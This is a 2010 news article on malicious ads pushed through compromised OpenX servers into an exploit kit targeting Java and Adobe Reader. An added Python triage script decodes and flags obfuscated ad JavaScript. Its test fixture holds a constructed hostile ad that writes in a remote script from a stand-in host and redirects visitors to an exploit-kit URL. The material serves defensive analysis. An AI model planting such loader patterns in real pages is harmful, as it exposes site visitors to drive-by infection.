Malicious ads served from compromised server

Jul 1, 2010 10:07 GMT

Security researchers warn that hackers are compromising outdated OpenX servers in order to push malicious ads on other websites. The latest attack employs an exploit cocktail in an attempt to infect visitors with malware.

OpenX is an open source ad server that publishers download, install and run on their own infrastructure. It fills a role similar to hosted services such as Google's AdSense, letting site owners serve ad campaigns, track clicks and view statistics, with the difference that the operator, not a third party, is responsible for hosting and patching the server.

Running such a server and selling ad placement might appeal to some people with the necessary resources. From a security perspective, however, such installations are dangerous if they are not updated regularly: the ad markup the server emits is executed in the context of every publisher page that embeds it, so compromising a single OpenX server instantly lets an attacker place malicious code on all websites loading ads from it, endangering far more users than the server's own visitors.

The attack reported by Sophos is an example of a vulnerable OpenX server being used to serve an ad with obfuscated, malicious JavaScript attached. That code loads a second obfuscated script, which in turn redirects visitors to a third one.

The third script is part of an exploit kit. It first fingerprints the visitor's browser to determine which software and plug-ins are installed, then loads the exploits matching the vulnerable applications it finds. In this case the exploits target outdated Java and Adobe Reader installations.
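A chain of obfuscated scripts like the one described above is what an analyst typically has to triage from a captured ad response. The following Python script is an added example, not code from the article or from Sophos: it statically unwraps the two cheap obfuscation layers most often seen in such ads (`unescape()` of percent-encoded markup and `eval(String.fromCharCode(...))`), pulls out any URLs and remote-script or redirect constructs that appear after decoding, and flags the response when both obfuscation and a hand-off to another host are present. The two sample ad responses are constructed for this example (hostnames use the reserved `.invalid` TLD) and are not payloads from the incident on the page.

```python
import re
from urllib.parse import unquote

# Constructed sample ad responses (not captured from the incident on the page).
# A normal banner: a link wrapping an image, nothing executable.
BENIGN_AD = (
    '<a href="http://shop.example.invalid/">'
    '<img src="http://cdn.example.invalid/banner.gif"></a>'
)

# A booby-trapped ad: stage 1 writes a remote <script> tag for stage 2 via
# unescape(), then eval()s a char-code-encoded redirect to a stage 3 host.
STAGE3_REDIRECT = 'location.href="http://kit.example.invalid/in.php";'
MALICIOUS_AD = (
    '<script>'
    'document.write(unescape("%3Cscript%20src%3D%22http%3A%2F%2F'
    'stage2.example.invalid%2Fa.js%22%3E%3C%2Fscript%3E"));'
    'eval(String.fromCharCode('
    + ",".join(str(ord(c)) for c in STAGE3_REDIRECT)
    + '));'
    '</script>'
)

# Constructs that are rare in honest ad markup but common in obfuscated loaders.
SUSPICIOUS_CALLS = ("eval(", "unescape(", "String.fromCharCode(", "document.write(")

URL_RE = re.compile(r'https?://[^\s"\'<>]+')
FROMCHARCODE_RE = re.compile(r'String\.fromCharCode\(([\d,\s]+)\)')
UNESCAPE_RE = re.compile(r'unescape\(\s*(["\'])(.*?)\1\s*\)')
HANDOFF_RE = re.compile(r'location(?:\.href)?\s*=|<script[^>]+\ssrc=', re.I)


def js_unescape(s):
    """Approximate JavaScript unescape(): %uXXXX first, then ordinary %XX."""
    s = re.sub(r'%u([0-9A-Fa-f]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def decode_layer(js):
    """Statically undo one layer of fromCharCode()/unescape() encoding.

    The decoded text is spliced in place of the call purely for inspection;
    the result is not meant to be valid or executable JavaScript.
    """
    js = FROMCHARCODE_RE.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()),
        js,
    )
    js = UNESCAPE_RE.sub(lambda m: js_unescape(m.group(2)), js)
    return js


def unwrap(js, max_layers=5):
    """Peel layers until nothing changes, with a cap against pathological input."""
    for _ in range(max_layers):
        nxt = decode_layer(js)
        if nxt == js:
            break
        js = nxt
    return js


def analyze(ad_html):
    """Return triage indicators for one ad response."""
    indicators = [c for c in SUSPICIOUS_CALLS if c in ad_html]
    decoded = unwrap(ad_html)
    urls = sorted(set(URL_RE.findall(decoded)))
    hands_off = HANDOFF_RE.search(decoded) is not None
    return {
        "indicators": indicators,          # obfuscation primitives seen in the raw ad
        "urls": urls,                      # hosts the chain reaches after decoding
        "loads_remote_script": hands_off,  # writes a remote <script> or redirects
        "suspicious": bool(indicators) and hands_off,
    }


if __name__ == "__main__":
    for name, ad in (("benign", BENIGN_AD), ("malicious", MALICIOUS_AD)):
        print(name, analyze(ad))
```

This is a static heuristic for first-pass triage only: a loader that builds its next stage with string arithmetic, `document.cookie` checks or a packer will not decode this way and needs a sandboxed browser or a JavaScript interpreter. The useful property for an ad-server operator is that the check runs against what the server actually emits, so it catches an injected payload regardless of which publisher page it ends up on.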

"Consistent with the recent rise we have reported in Java exploits, this attack involves malicious class files, targeting the HsbParser.getSoundBank vulnerability (CVE-2009-3867) and an old privilege escalation vulnerability in the handling of ZoneInfo objects during deserialization (CVE-2008-5353)," Fraser Howard, a senior virus researcher at Sophos, explains. Sophos' anti-malware products detect the Java exploits as Troj/BytVrfy-C and Troj/Clsldr-U, while the malicious PDF file is detected as Troj/PDFJs-LE.

Mr. Howard advises OpenX server owners to consider a hosted solution if they are unable to keep their software up to date. According to him, the server compromised in this attack was running OpenX 2.8.0, while the latest version is 2.8.5.